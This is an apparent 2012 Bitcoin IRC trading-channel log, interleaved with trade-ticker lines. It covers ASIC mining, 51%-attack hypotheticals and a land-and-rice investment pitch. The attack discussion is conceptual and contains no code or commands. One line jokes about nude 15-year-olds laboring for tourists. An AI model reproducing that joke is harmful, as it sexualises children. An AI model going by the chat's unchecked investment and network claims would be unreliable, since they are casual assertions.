deepbit Sep 21 12:59:20 No, because it is in the customers' best interest to buy OTHER PEOPLES' asics. Sep 21 12:59:36 to starve them out as much as possible so they aren't able to mine as effectively. Sep 21 12:59:38 asicminer will mine no matter who you send your money to Sep 21 12:59:46 lol mine as effectively? Sep 21 12:59:50 But they'll mine less if nobody ever buys their devices. Sep 21 12:59:52 the first x units belong to shareholders period Sep 21 12:59:52 im on a boat! Sep 21 13:00:02 midnightmagic: wrong Sep 21 13:00:05 if NO ONE buys them Sep 21 13:00:11 In other words, customers *should* if they were smart, be forcing them into a purely self-mining contract. Sep 21 13:00:12 then it all becomes shareholder owned eventually Sep 21 13:00:22 And at that point, doing their best to ensure tha the bitcoin devs stomp them. Sep 21 13:00:22 and they are still all online Sep 21 13:00:29 lol bitcoin devs Sep 21 13:00:40 then basic and deepbit are also fucked Sep 21 13:00:45 Which given that most people don't grasp the nature of how anticompetitive what they're planning on doing is, is far more likely to happen. Sep 21 13:00:47 plus anyone on gpu mining since you wont have me to write a new kernel Sep 21 13:00:51 No, WRONG. Sep 21 13:01:00 And wrong again. Sep 21 13:01:01 [GLBSE] [SILVER] 1 @ 0.00999999 BTC [-] Sep 21 13:01:29 plus, half the network will ignore you Sep 21 13:01:40 You're thinking in terms of miners. Sep 21 13:01:49 THATS THE WHOLE FUCKING GODDAMNED NETWORK Sep 21 13:01:57 Whose software do you think the users are going to use? Sep 21 13:02:05 The asicminer conglomerates? Sep 21 13:02:08 Keep dreaming. Sep 21 13:02:16 if I write my own bitcoin client? mine. Sep 21 13:02:49 Every vendor was told, as Luke-Jr said, to put a small additional secret piece of logic into their asics. Sep 21 13:02:53 midnightmagic or you talking with D3? if so give up :) Sep 21 13:02:54 And keep it secret. Sep 21 13:02:59 or = are Sep 21 13:03:49 Chaang-Noi: I will in a moment, I'm in pacific time. Sep 21 13:04:08 you want win, it is like talking to a rock Sep 21 13:04:13 And if those vendors end up just being one giant self-mining masturbation circlejerk? Sep 21 13:04:13 cant* Sep 21 13:04:19 bitcoin devs change the hashing algo. Sep 21 13:04:41 And every repsonsible asic device can now mine its own type of block. Sep 21 13:04:47 And everyone accepts them. Sep 21 13:05:51 And the naughty conglomerate that went overboard into a super fancy mining contract because they discovered nobody's willing to buy their device and fund competition against themselves? They go away and lots of paperweights mine on a scamcoin altchain. Sep 21 13:06:01 _lol_ Sep 21 13:06:03 wow Sep 21 13:06:28 Hey don't hate the playa, hate the game. Sep 21 13:07:04 [GLBSE] [ASICMINER] 2 @ 0.123 = 0.246 BTC [+] Sep 21 13:07:09 I imagine if bitcoin changed algo it'd probably be the fastest way to kill the network, so your point is moot Sep 21 13:07:10 but the devs have already stated they will not change the algo Sep 21 13:07:20 indeed Sep 21 13:07:23 Diablo-D3: Then what's Luke saying in the asicminer thread? Sep 21 13:07:37 I dont know, Ive already asked theymos to ban him until he stops trolling Sep 21 13:07:53 infact I unsubscribed from the asicminer thread due to all the trolling Sep 21 13:08:22 Yeah right. A hardfork later and every user who listens to Gavin when he says "Hey these guys can now attack the network, upgrade now to avoid it," makes the old fork die. Sep 21 13:08:57 and why do you think I wanted DMC to have substantial hashpower from multiple manufs? Sep 21 13:09:08 stops 51% attacks dead Sep 21 13:10:38 Here I'll quote: "That is not necessarily true. ASIC vendors are advised to implement an alternative algorithm they can switch to in case of emergency like this. If the community felt it necessary to block out ASICMINER (or some other hostile ASIC hoarder), the other ASIC vendors would then publish their secret alternative algorithms, and Bitcoin could be made to support those." Sep 21 13:10:47 "That is not necessarily true. ASIC vendors are advised to implement an alternative algorithm they can switch to in case of emergency like this. If the community felt it necessary to block out ASICMINER (or some other hostile ASIC hoarder), the other ASIC vendors would then publish their secret alternative algorithms, and Bitcoin could be made to support those." Sep 21 13:10:53 err.. Sep 21 13:10:56 "That is not necessarily true. ASIC vendors are advised to implement an alternative algorithm they can switch to in case of emergency like this. If the community felt it necessary to block out ASICMINER (or some other hostile ASIC hoarder), the other ASIC vendors would then publish their secret alternative algorithms, and Bitcoin could be made to support those." Sep 21 13:11:01 wtf! Sep 21 13:11:14 "Edit: There is no single "secret alternative algorithm" being issued/given to ASIC vendors. They are all expected to come up with their own and not share it outside the company except in an emergency." Sep 21 13:11:18 there Sep 21 13:12:11 [GLBSE] [OBSI.HRPT] 2 @ 0.098 = 0.196 BTC [-] Sep 21 13:12:56 What that means is simple: 5 ASIC vendors = 5 secret algos. asic vendor misbehaves? hash algo switches to support the other 4 (who are now building individually different blocks) and #5 == paperweight. Sep 21 13:13:57 Assuming what Luke says, is true. Sep 21 13:14:29 yeah luke is out of his mind Sep 21 13:15:09 They assume a hostile ASIC hoarder will necessarily be a manufacturer\/ Sep 21 13:15:19 yeah Sep 21 13:15:24 No, it works for anyone. Sep 21 13:15:27 or hell Sep 21 13:15:34 And everyone who doesn't do it, gets screwed when they're discovered. Sep 21 13:15:35 it assumes the hostile is public Sep 21 13:15:45 I could very well run my own asics in china Sep 21 13:15:49 get about 100th assembled Sep 21 13:15:52 and then just switch it on Sep 21 13:15:54 No, because GPU + fpga + cpu + 5 asic vendors can all adapt. Sep 21 13:16:07 you cant even tell its one miner Sep 21 13:16:27 The most likely hostile asic horders / 51% attackers will not be companie which rely on Bitcoin being successful to make money Sep 21 13:16:29 you haven't read the papers. yeah, the network can. Sep 21 13:16:38 nope, the network cannot Sep 21 13:16:48 no it cant Sep 21 13:16:55 in fact, yeah, it can. it doesn't even take very many listening posts to do it. Sep 21 13:17:17 esp. if someone runs a crawler or a dns seed. Sep 21 13:17:34 Run 100 bitcoinds on VPS around the world, mine to them Sep 21 13:17:41 and what happens when I use tor and segregate my bitcoinds to different parts of the network? Sep 21 13:17:45 Here we have 100 miners each controlling 0.5% of the network Sep 21 13:18:41 you're not listening. the entire network can be mapped out and all mining hashrate identified. neither of you have read the academic papers describing how to do this or you wouldn't be arguing with me. Sep 21 13:19:25 Still, it doesn't matter, all it takes is a suspicion, or an attempt to make use of the >50%. Sep 21 13:19:26 okay so, I have a bunch of nodes that seem like they're coming from different continents, and none of them connect to the same peers by collusion Sep 21 13:19:48 and then they mine on each others blocks when the opportunity arises Sep 21 13:20:00 In fact, I'm pretty sure someone recently already has gotten >50%. But if they play nice and don't screw with the network trust, then it doesn't matter does it? Sep 21 13:20:15 so how, pray tell, can you tell? Sep 21 13:20:30 And if they do? It changes, everybody adapts, and laugh when we discover all the special asic out there have become useless and the network contracts by X TH Sep 21 13:20:35 k so what if I run 3 different brands of ASIC? Sep 21 13:20:50 yeah, what happens if I run all the brands of asic PLUS gpus and fpgas? Sep 21 13:21:01 Luceo: You're missing my point. Right now, they only mine if they mine using the current hash algo. Sep 21 13:21:30 midnightmagic: go have gmaxwell and sipa explain to you why you're wrong Sep 21 13:21:33 Luceo: If you've amassed all the different asic so you only take a 1/3 hit, your ability to attack is lessened. Sep 21 13:22:04 But the total network outside my control takes a severe hit too Sep 21 13:22:07 Diablo-D3: lol you know I'm right. We both know I'm right. Sep 21 13:22:15 Luceo: You're just talking about a normal 50% attack now. Sep 21 13:22:15 So the target to attack is lessened Sep 21 13:22:16 no, I know Im right Sep 21 13:23:18 Diablo-D3: If you think you're right, give your head a shake. It's trivial to do. It takes about 3 months to upgrade 95%, and that's just for a non-impact lame-o ddos fix with no known sightings in the wild. Sep 21 13:23:30 okay so Sep 21 13:23:31 you're saying Sep 21 13:23:34 you kill an asic manuf Sep 21 13:23:40 what happens when I have every hardware made Sep 21 13:23:49 you crippled the network as much as you cripple me Sep 21 13:23:51 Then you have just accomplished a 50% attack. Sep 21 13:23:57 Good for you. Sep 21 13:24:01 [MPEX] [F.GIGA.ETF] 17000 @ 0.000301 = 5.117 BTC [+] Sep 21 13:24:02 Have a gold star. Sep 21 13:24:14 But if one asic manufacturer is being antisocial? Sep 21 13:24:14 not only is it good for me, it means I trivially destroyed your attack against me Sep 21 13:24:18 Stomp. Sep 21 13:24:57 If you're an end-customer, you pay most of the full retail price. Sep 21 13:25:02 That's a normal 50% attack. Sep 21 13:25:16 If you're an asic that just tok everyone's money publically to attack the network? Sep 21 13:25:19 Stomp. Sep 21 13:25:39 (Because a second run costs $2/chip or whatever it is?) Sep 21 13:25:42 Stompy-stomp. Sep 21 13:26:23 I think that ASIC manufacturer would be more likely to sell slashed price chips than attack the network Sep 21 13:26:58 Do they sell to just one customer? If yes, detectably, stomp. If no, great, everyone benefits. Sep 21 13:27:17 lol Sep 21 13:27:30 and what happens if I just have a million fpgas? Sep 21 13:27:35 anything you can do, I can do better Sep 21 13:27:40 Even if you sell to one customer Sep 21 13:27:53 It's unlikely to be 50% hash power Sep 21 13:27:54 in one run Sep 21 13:28:10 Good for you, you just wasted a whole pile of money and did a 50% attack that requires an order of magnitude more money than the asic users spent. Sep 21 13:28:10 The ASIC company does not benefit from enabling a 51% attack Sep 21 13:28:39 If you sell cars, and I offer to pay you to help me break the road system, you're not going to join in Sep 21 13:29:49 False analogy. I detect the beginning of the moebius strip. Bedtime for me, Diablo-D3 I wish you a good night, sincerely. Sell your asicminer shares, buy ngzhang hardware. Sep 21 13:30:14 I already sold those shares for 2x abmo like a month ago Sep 21 13:30:34 Oh! Wait, then what do you care whether asicminer falls on its ass? lol Sep 21 13:30:50 In fact, if you mine, you should be hoping for that. Sep 21 13:31:00 I dont care Sep 21 13:31:06 I just expect realistic arguments from people Sep 21 13:32:30 My two main arguments are: 1) asicminer if they continue to mine after they start selling hardware, are cannibalizing their own devices' worth. 2) asic vendors can be stomped if Luke-Jr is correct. Sep 21 13:32:48 Those are both sound arguments. And it's really bedtime for me. Good night D3. Sep 21 13:38:49 And at that point, doing their best to ensure tha the bitcoin devs stomp them. << bitcoin devs are not some sort of authority. Sep 21 13:39:17 [GLBSE] [GIGAMINING] 2 @ 0.68 = 1.36 BTC [-] Sep 21 13:39:19 [GLBSE] [GIGAMINING] 5 @ 0.689 = 3.445 BTC [+] Sep 21 13:40:30 it boggles me that anyone would think differently. Sep 21 13:42:08 [GLBSE] [ASICMINER] 7 @ 0.123 = 0.861 BTC [+] Sep 21 13:42:10 [GLBSE] [ASICMINER] 49 @ 0.12478 = 6.1142 BTC [+] Sep 21 13:42:17 mircea_popescu: yeah Sep 21 13:42:29 as if anyone gives two rats asses what they "think Sep 21 13:42:38 they contribute useful shit for free on their own time/expesne ? Sep 21 13:42:42 great. everyone's using it. Sep 21 13:42:54 the want as much as fiddy cents ? take a hike, there's fiddy billion people who can code. Sep 21 13:43:33 >50 billion Sep 21 13:43:37 >on planet of 7 billion Sep 21 13:43:43 exactly. Sep 21 13:43:44 Im not saying its aliens, but its aliens Sep 21 13:44:18 "everybody and their dog" where everybody has more than one dog. Sep 21 13:45:03 still, the average person would need 6.14 dogs Sep 21 13:45:17 almost two pie. Sep 21 13:48:02 http://www.youtube.com/watch?feature=player_embedded&v=g7WjrvG1GMk << the hero pig Sep 21 13:48:22 saves a goat from boating accident Sep 21 13:50:16 1 hour and 26 minutes until black mesa is downloaded Sep 21 13:53:02 [MPEX] [S.MPOE] 21700 @ 0.00038575 = 8.3708 BTC [-] Sep 21 13:56:51 yes Sep 21 13:56:55 they finally finished it Sep 21 13:57:13 black mesa is a fan remake of half life 1 Sep 21 13:57:28 uses source engine, looks about as good as portal 2 does Sep 21 13:58:24 [GLBSE] [OBSI.HRPT] 2 @ 0.0951 = 0.1902 BTC [-] Sep 21 13:58:24 [GLBSE] [OBSI.HRPT] 18 @ 0.09500002 = 1.71 BTC [-] Sep 21 13:58:26 [GLBSE] [OBSI.HRPT] 2 @ 0.09500001 = 0.19 BTC [-] Sep 21 13:58:27 [GLBSE] [OBSI.HRPT] 45 @ 0.095 = 4.275 BTC [-] Sep 21 13:59:59 EskimoBob: you do realize video games are a billion dollar market, right? Sep 21 14:00:55 and half-life is one of the highest grossing PC games ever Sep 21 14:01:31 its sequel, half life 2, IS the most highest grossing PC game ever Sep 21 14:03:20 by btc, then watch it lose 60 cents, lol Sep 21 14:06:08 ;;ticker Sep 21 14:06:08 Best bid: 12.011, Best ask: 12.0499, Bid-ask spread: 0.03890, Last trade: 12.011, 24 hour volume: 39823, 24 hour low: 12.011, 24 hour high: 12.57001 Sep 21 14:19:02 [MPEX] [F.GIGA.ETF] 8142 @ 0.000301 = 2.4507 BTC [+] Sep 21 14:28:15 [GLBSE] [OBSI.HRPT] 16 @ 0.09500001 = 1.52 BTC [+] Sep 21 14:28:17 [GLBSE] [OBSI.HRPT] 31 @ 0.095 = 2.945 BTC [-] Sep 21 14:31:46 [GLBSE] [PUREMINING] 1 @ 0.0999 BTC [+] Sep 21 14:31:48 [GLBSE] [PUREMINING] 5 @ 0.1 = 0.5 BTC [+] Sep 21 14:31:49 [GLBSE] [PUREMINING] 25 @ 0.105 = 2.625 BTC [+] Sep 21 14:31:50 [GLBSE] [PUREMINING] 2 @ 0.11 = 0.22 BTC [+] Sep 21 14:31:51 [GLBSE] [PUREMINING] 5 @ 0.115 = 0.575 BTC [+] Sep 21 14:33:41 mircea_popescu: I have found an image that best describes what I feel right now: http://imgur.com/gallery/ZphAO Sep 21 14:36:10 [GLBSE] [BITBOND] 1 @ 0.369 BTC [-] Sep 21 14:48:55 lol this in reference to the asicminer thinfg ? Sep 21 14:49:36 [MPEX] [S.MPOE] 500 @ 0.00038754 = 0.1938 BTC [+] Sep 21 14:58:53 [MPEX] [O.BTCUSD.P100T] 15 @ 0.03904442 = 0.5857 BTC [-] Sep 21 14:58:54 [MPEX] [O.BTCUSD.P100T] 22 @ 0.03662009 = 0.8056 BTC [-] Sep 21 15:01:02 [MPEX] [O.BTCUSD.P200T] 1 @ 0.70611353 BTC [-] Sep 21 15:01:03 [MPEX] [O.BTCUSD.P200T] 1 @ 0.6730893 BTC [-] Sep 21 15:01:04 [MPEX] [O.BTCUSD.P200T] 111 @ 0.61997735 = 68.8175 BTC [-] Sep 21 15:01:05 [GLBSE] [IBB] 4 @ 0.57 = 2.28 BTC [-] Sep 21 15:01:55 [MPEX] [O.BTCUSD.P200T] 2 @ 0.61997735 = 1.24 BTC [-] Sep 21 15:03:28 [MPEX] [O.BTCUSD.P090T] 15 @ 0.00024578 = 0.0037 BTC [-] Sep 21 15:04:06 [MPEX] [O.BTCUSD.P010T] 125 @ 0.00000002 BTC [-] Sep 21 15:05:02 [MPEX] [O.BTCUSD.P150T] 500 @ 0.21423301 = 107.1165 BTC [-] Sep 21 15:06:12 midnightmagic: if I'm correct? huh? Sep 21 15:07:10 [MPEX] [O.BTCUSD.C120T] 10 @ 0.09164025 = 0.9164 BTC [-] Sep 21 15:07:11 [MPEX] [O.BTCUSD.C120T] 2 @ 0.08076672 = 0.1615 BTC [-] Sep 21 15:07:13 [MPEX] [O.BTCUSD.C120T] 938 @ 0.06753578 = 63.3486 BTC [-] Sep 21 15:10:24 [GLBSE] [BAKEWELL] 1 @ 0.1499999 BTC [-] Sep 21 15:20:01 mircea_popescu: yes Sep 21 15:26:32 [GLBSE] [ASICMINER] 13 @ 0.12518 = 1.6273 BTC [+] Sep 21 15:33:29 [MPEX] [S.MPOE] 8275 @ 0.00038575 = 3.1921 BTC [-] Sep 21 15:42:15 is GLBSE slow for everyone or just me? Sep 21 15:42:34 its always slow Sep 21 15:42:37 or not working. Sep 21 15:45:20 https://bitcointalk.org/index.php?topic=111837.0 Sep 21 15:45:25 feedback wnated, thanks Sep 21 15:46:06 [GLBSE] [DI.BFLSC.SUCCEED] 5 @ 0.001 = 0.005 BTC Sep 21 15:58:09 [GLBSE] [BLUECHIP] 5 @ 0.1 = 0.5 BTC [+] Sep 21 15:59:02 [MPEX] [S.MPOE] 750 @ 0.00038754 = 0.2907 BTC [+] Sep 21 16:00:24 not everyone at once:) Sep 21 16:01:42 [GLBSE] [BLUECHIP] 45 @ 0.1 = 4.5 BTC [+] Sep 21 16:06:23 [GLBSE] [FDBF] 26 @ 0.15 = 3.9 BTC [+] Sep 21 16:06:25 [GLBSE] [FDBF] 104 @ 0.15 = 15.6 BTC [+] Sep 21 16:11:40 [GLBSE] [ASICMINER] 20 @ 0.12507 = 2.5014 BTC [-] Sep 21 16:12:57 [GLBSE] [KRAKEN] 2 @ 0.00999996 = 0.02 BTC [+] Sep 21 16:15:20 [GLBSE] [PLATINUM] 2 @ 0.00999999 = 0.02 BTC [-] Sep 21 16:16:31 [GLBSE] [GOLD] 2 @ 0.00999999 = 0.02 BTC [-] Sep 21 16:17:28 [GLBSE] [SILVER] 2 @ 0.00999999 = 0.02 BTC [-] Sep 21 16:26:02 [MPEX] [S.MPOE] 8200 @ 0.00038617 = 3.1666 BTC [-] Sep 21 16:26:03 [MPEX] [S.MPOE] 3856 @ 0.00038575 = 1.4875 BTC [-] Sep 21 16:26:05 [MPEX] [S.MPOE] 12644 @ 0.00038566 = 4.8763 BTC [-] Sep 21 16:32:24 Hi Smoovious Sep 21 16:32:38 I think it is more or less going to be 5 to 6% Sep 21 16:33:07 it seems that i can but land for 50,000 baht, get 7,000 to 8,000 baht worth of right and then get to keep 40% to 50% of that Sep 21 16:33:18 land maybe at 40,000 too Sep 21 16:33:33 yes, you will be betting on land and rice going up in value Sep 21 16:33:56 ASEAN is about to open up in 2015 and well land should go way up Sep 21 16:34:03 but yeah, its not a get rich quick thing Sep 21 16:34:20 :) i have been looking for a way to get into land and food for a long time now Sep 21 16:34:31 this is great cuz i can work the land with out working it Sep 21 16:35:09 https://bitcointalk.org/index.php?topic=111837.0 Sep 21 16:35:16 please post why you think that here.... Sep 21 16:35:30 yeah Sep 21 16:35:30 Chaang-Noi: you wishing pirate a happy birthday!??! Sep 21 16:35:35 lol :) Sep 21 16:35:47 im not copumpkin but thanks for the reminder, hehe Sep 21 16:36:06 land and rice are real things... Sep 21 16:36:20 it is something i will be doing Sep 21 16:36:35 im seeing if anyone wants to join me, if they dont thats cool. im still doing it for sure Sep 21 16:36:46 yes please post about the issues in the thread so we can debate them Sep 21 16:37:36 they have lawys here too usagi Sep 21 16:37:56 how do you enforce land claims in china or england? Sep 21 16:38:04 its a title Sep 21 16:38:19 yes if there is a second comunist revolution we will be fucked Sep 21 16:39:09 yeah i or my wifes family will live there Sep 21 16:39:28 if its small scale just let my wives family manage it Sep 21 16:39:43 its sharecropping if you did not read the thread... Sep 21 16:40:27 anyway im doing it. if there is enough interest i will list it on glbse, if there is huge interest ill just make it into a real corporation Sep 21 16:40:51 i think both land and food (rice) will be going up invalue so im buying in Sep 21 16:41:02 and doing so in a place were labour is almost free Sep 21 16:41:15 50% of the rice... we dont pay for anything jsut the land... Sep 21 16:41:38 no its not 1% a day but it is a real asset that is paying dividends while going up in value... Sep 21 16:44:22 [GLBSE] [BITCOINMINV] 32 @ 0.12599 = 4.0317 BTC [+] Sep 21 16:46:01 so let me get this straight, you take bitcoins, buy land Sep 21 16:46:07 in 2 years maybe land doubled in value Sep 21 16:46:13 bitcoin doubles in value by 2013 Sep 21 16:46:14 profit ? Sep 21 16:46:21 also, rice Sep 21 16:46:27 o right, rice. forgot the rice. Sep 21 16:46:30 :DDD Sep 21 16:47:11 i could see it if it's a farm where nude 15 yo's work to exhaustion Sep 21 16:47:19 then you sell touring tickets to middle aged german doods. Sep 21 16:48:16 i highly doubt most investors have 100% of their wealth in BTC Sep 21 16:48:38 some people who have extra fiat would not mind buying land and rice. Sep 21 16:48:42 with fiat. Sep 21 16:48:57 i could take fiat or btc, i dont care really. Sep 21 16:49:19 >>you're never going to have a stock/bond issue that is exclusively bitcoin value until every last bit of the expenses, Sep 21 16:49:22 wrong. Sep 21 16:49:33 i would be happy to do this outside of glbse and make it pure local currancy corporation Sep 21 16:49:39 orly Sep 21 16:50:05 i do not need btc to do the rice farm... it is just an easy way to collect funds... Sep 21 16:50:05 well my case is im workin on one. Sep 21 16:50:32 me Sep 21 16:50:48 im bitcoin denominated Sep 21 16:50:54 :) Sep 21 16:51:42 that's ridiculous, s.mpoe is 100% bitcoin, s.dice is 100% bitcoin etc. Sep 21 16:51:52 [GLBSE] [GIGAMINING] 1 @ 0.67989 BTC [-] Sep 21 16:51:59 [MPEX] [F.GIGA.ETF] 6400 @ 0.000301 = 1.9264 BTC [+] Sep 21 16:52:00 preety much ya Sep 21 16:52:04 buying a non-bitcoin asset with bitcoins is in fact divesting bitcoin. and that's something most people don't want to do. Sep 21 16:53:10 ads Sep 21 16:54:03 i will take fiat, i dont need bitcoin to buy land and rice... also if people dont like the idea they dont have to join me. Sep 21 16:54:24 hell, i would even take ltc:) Sep 21 16:55:12 :) Sep 21 16:55:27 so you're moving out of btc ? Sep 21 16:55:31 i could tell them to plant corn and take popcoin Sep 21 16:56:03 moving out of btc? do you read the stuff you post? Sep 21 16:56:12 lol Sep 21 16:56:16 there was beercoin Sep 21 16:56:21 that was started in thailand Sep 21 16:56:24 it failed :/ Sep 21 16:56:41 beercoin was a while ago, i dont know if many people remember that Sep 21 16:56:51 might have even been first fork Sep 21 16:57:04 i hold 100,000 ltc did i leave btc? Sep 21 16:57:13 "I agree that's why I am trying to start a forum with less FUD and Crap to go along with it, but iis seems people scoff at it from lack of users. But the the things is, it would not matter if they really wanted some change from the community." aww Sep 21 16:57:14 i hold silver, did i leave gold? :) Sep 21 16:57:29 15:53.09 ( Smoovious ) if I started a company right now, sure, I could make all of my transactions based on bitcoin, if I wanted to, but all of my expenses would be based on USD, because that is the economy I'm operating in... Sep 21 16:57:30 Chaang-Noi aite, so do some actual btc projects. Sep 21 16:57:34 if my expences are 5 btc a month Sep 21 16:57:39 how is this USD based Sep 21 16:57:41 get real Sep 21 16:57:58 mp i can do whatever i want to do, but thanks for caring :) Sep 21 16:58:40 my time Sep 21 16:58:50 my time Sep 21 16:59:02 i sell my time Sep 21 16:59:05 which i take for free Sep 21 17:00:06 if the usd/btc rate Sep 21 17:00:12 is irrelevat to the costs Sep 21 17:00:21 than usd has nothing to do with it Sep 21 17:00:23 [GLBSE] [GIGAMINING] 31 @ 0.67989 = 21.0766 BTC [-] Sep 21 17:00:38 if my contract says 5 btc Sep 21 17:00:44 it will be 5btc Sep 21 17:00:52 if my contract says 50eur in btc Sep 21 17:00:54 it will be that Sep 21 17:00:59 if my contract says 1% of the profit Sep 21 17:01:01 it will be that Sep 21 17:02:40 that will be your opinion Sep 21 17:03:32 k Sep 21 17:03:35 that is your opinion Sep 21 17:03:37 :) Sep 21 17:05:24 in the end ill prolly stick with a small perecntage of profits Sep 21 17:06:37 when you give me an apple and ill bring back apple an a half, i will take 5% of that half of apple i brought back. Sep 21 17:07:04 im on a boat! Sep 21 17:07:23 cool! Sep 21 17:07:27 and im a goat! Sep 21 17:07:50 the best thing about it Smoovious is so smart yet he has no idea what im going to do. Sep 21 17:09:13 hehe Sep 21 17:11:14 ... Sep 21 17:11:45 [GLBSE] [JTME] 1 @ 0.96998 BTC [-] Sep 21 17:12:09 i might be a goat Sep 21 17:12:16 how would i know... Sep 21 17:12:40 Chaang-Noi http://www.youtube.com/watch?feature=player_embedded&v=g7WjrvG1GMk Sep 21 17:12:44 no im pretty damn sure im on a boat Sep 21 17:13:01 hi Sep 21 17:18:02 [MPEX] [S.MPOE] 10416 @ 0.00038596 = 4.0202 BTC [+] Sep 21 17:18:03 [MPEX] [S.MPOE] 14035 @ 0.00038754 = 5.4391 BTC [+] Sep 21 17:18:43 aww why not Sep 21 17:20:57 what is wrong with paying people to do work? Sep 21 17:21:41 hello world :) this channel seems quite active :) Sep 21 17:21:53 smoovious http://xkcd-map.rent-a-geek.de/#10/0.8960/-12.3335 Sep 21 17:22:37 yeah its me on the boat :) Sep 21 17:22:47 I think you can Sep 21 17:22:56 please tell us how :) Sep 21 17:22:56 didn't gmaxwell link to it at some point? Sep 21 17:22:59 hello PeanutPower Sep 21 17:23:00 Chaang-Noi: Im speaking to a lawyer in 30 minutes Sep 21 17:23:02 can't remember Sep 21 17:23:02 happy now? Sep 21 17:23:08 yay law Sep 21 17:23:19 no im not really happy nefario Sep 21 17:23:34 all this talk of me being sued Sep 21 17:23:37 by you Sep 21 17:23:42 im not going to sue you Sep 21 17:23:46 I hope not Sep 21 17:23:49 lol Sep 21 17:23:50 i was smart enough to not give you my id Sep 21 17:23:59 you have any idea how rediculous it would be to have a goat in the courtroom Sep 21 17:24:09 nefario: he'd be hopping over other goats Sep 21 17:24:12 iv been in the courtroom Sep 21 17:24:16 I hope you've seen the video, cause I've linked it enough times Sep 21 17:24:22 and i let lawyers talk for me there... Sep 21 17:24:46 wow whats will all the legal talk :O ? Sep 21 17:24:58 smickles http://xkcd-map.rent-a-geek.de Sep 21 17:24:59 eh Sep 21 17:24:59 posting copies of peoples passports in public seems illegal to me in europe... i know it is in the usa... Sep 21 17:25:02 Smoovious http://xkcd-map.rent-a-geek.de Sep 21 17:25:05 *with... my dyslexic typing Sep 21 17:25:18 hm Sep 21 17:25:20 nevermind Sep 21 17:25:28 i see it was posted already Sep 21 17:25:42 my chat window was too smal Sep 21 17:25:45 got cut Sep 21 17:25:45 yahoo answers is super reputable! http://answers.yahoo.com/question/index?qid=20101210045408AAx55yG Sep 21 17:26:22 nefario the only one who can sue you is that scammer Sep 21 17:26:35 wow the xkcd map thing is quite cool Sep 21 17:26:39 yeah it is Sep 21 17:26:45 you're never going to have a stock/bond issue that is exclusively bitcoin value until every last bit of the expenses, "" << damn, that was just funny to read Sep 21 17:26:52 copumkin do you know of a place we can download that image? Sep 21 17:27:02 agreed smickles Sep 21 17:27:08 [GLBSE] [TYGRR.BOND-P] 1 @ 0.03300101 BTC [-] Sep 21 17:27:09 [GLBSE] [TYGRR.BOND-P] 3 @ 0.033001 = 0.099 BTC [-] Sep 21 17:27:18 Smoovious should lay off pot for a while Sep 21 17:27:24 ;> Sep 21 17:27:37 hm i saw a single image file Sep 21 17:27:47 ill look it up if its mah history Sep 21 17:27:49 Chaang-Noi: I think it would be interesting if he tried Sep 21 17:27:56 no offense intended Smoovious, it's just you were wrong, and there are a few of us here that operate things solely in btc, as i'm sure was pointed out to you Sep 21 17:28:49 i agree nefario Sep 21 17:28:51 At 165888 x 79872 pixels, or 1.3 terapixels, the image would fill the screens of 4212 iPads with retina displays in an 81 x 52 grid. Sep 21 17:29:13 Smoovious: look at S2CM Sep 21 17:29:36 I put out sec equivilant reports showing only btc expenses Sep 21 17:29:43 here's a medium-sized version http://www.wickedglitch.com/cheatsheets/xkcd_clickdrag_spoiler.png Sep 21 17:30:01 [GLBSE] [ASICMINER] 32 @ 0.12488 = 3.9962 BTC [-] Sep 21 17:30:02 [GLBSE] [ASICMINER] 54 @ 0.12478 = 6.7381 BTC [-] Sep 21 17:30:03 [GLBSE] [ASICMINER] 48 @ 0.1235 = 5.928 BTC [-] Sep 21 17:30:45 they are monthy reports which show the information required on sec 10-k filings Sep 21 17:31:03 which are actually supposed to be annual filings Sep 21 17:31:42 http://dagar.ca/xkcd_1110_combined_512.png is 1/4 scale Sep 21 17:31:58 Smoovious: of you're looking for s2cm, the ticker is SS Sep 21 17:32:00 http://libesyr.so/dump/montage.png is the full one, I think Sep 21 17:32:55 also, https://bitcointalk.org/index.php?topic=74216.0 for the thread on the forum where i report the financials Sep 21 17:33:33 alright, sorry that i misinterprated you Sep 21 17:35:34 Smoovious: is that png good enough for you? Sep 21 17:36:58 i just figured that it was a business rather than a fund because the shareholders don't get a representation of the held assets, we have a business plan, expenses, employees, and provide a service Sep 21 17:37:50 also, off topic, i'm fairly poor at spelling things correctly Sep 21 17:38:06 "misinterprated" Sep 21 17:38:30 I'm fairly correct at spelling things poorly Sep 21 17:38:50 just the first and last letters must be in correct order Sep 21 17:38:54 the middle can be gibberish Sep 21 17:38:55 correct and rectum share a root. Sep 21 17:39:06 yes! Sep 21 17:39:25 kakobreklaa: the overall distribution of letters should be roughly the same Sep 21 17:39:45 for instance : kabokrekla Sep 21 17:39:52 nobody even noticed. Sep 21 17:39:57 :) Sep 21 17:40:16 also corapekin Sep 21 17:40:33 coprompkin? Sep 21 17:40:40 cofapkin Sep 21 17:42:00 thank you copumpkin that works for me :) Sep 21 17:42:02 curl shows me that it's 247 megs Sep 21 17:42:08 good luck finding something that can load it though Sep 21 17:42:19 I think photoshop's pretty good at it Sep 21 17:43:16 oh i cant see my boat Sep 21 17:43:24 that wont work copumpkin :( Sep 21 17:43:31 why not? Sep 21 17:43:37 you downloaded the extra huge one? Sep 21 17:43:41 not the 1/4 scale one? Sep 21 17:44:00 btw, im not a huge follower of oh xkcd how big of a deal is this giant map thing? Sep 21 17:44:10 not that big of a deal Sep 21 17:44:10 http://www.wickedglitch.com/cheatsheets/xkcd_clickdrag_spoiler.png this is what i have Sep 21 17:44:18 nah, that was just the first of many Sep 21 17:44:19 he does this sorta thing a lot? Sep 21 17:44:27 I then posted a 1/4 scale one, and then 1:1 Sep 21 17:44:43 http://dagar.ca/xkcd_1110_combined_512.png -> http://libesyr.so/dump/montage.png Sep 21 17:44:52 he doesn't do this sort of thing a lot, no Sep 21 17:45:01 he did another fairly large interactive one a while back Sep 21 17:45:02 [MPEX] [F.GIGA.ETF] 3000 @ 0.000301 = 0.903 BTC [+] Sep 21 17:45:25 well that pretty damn cool he did it abot bitcoin Sep 21 17:45:28 Smoovious: little do you know that I actually just made a massive version of goatse, tubgirl, and 2 girls 1 cup combined, and uploaded it for your benefit Sep 21 17:45:30 about* Sep 21 17:45:45 the author of xkcd used to hang out in -otc Sep 21 17:45:56 he also accepts bitcoin donations, very subtly Sep 21 17:46:06 i sent him a small donation Sep 21 17:46:07 http://xkcd.com/bitcoin/ Sep 21 17:46:12 [GLBSE] [OBSI.HRPT] 20 @ 0.0959 = 1.918 BTC [+] Sep 21 17:46:13 [GLBSE] [OBSI.HRPT] 25 @ 0.096 = 2.4 BTC [+] Sep 21 17:46:15 [GLBSE] [OBSI.HRPT] 25 @ 0.097 = 2.425 BTC [+] Sep 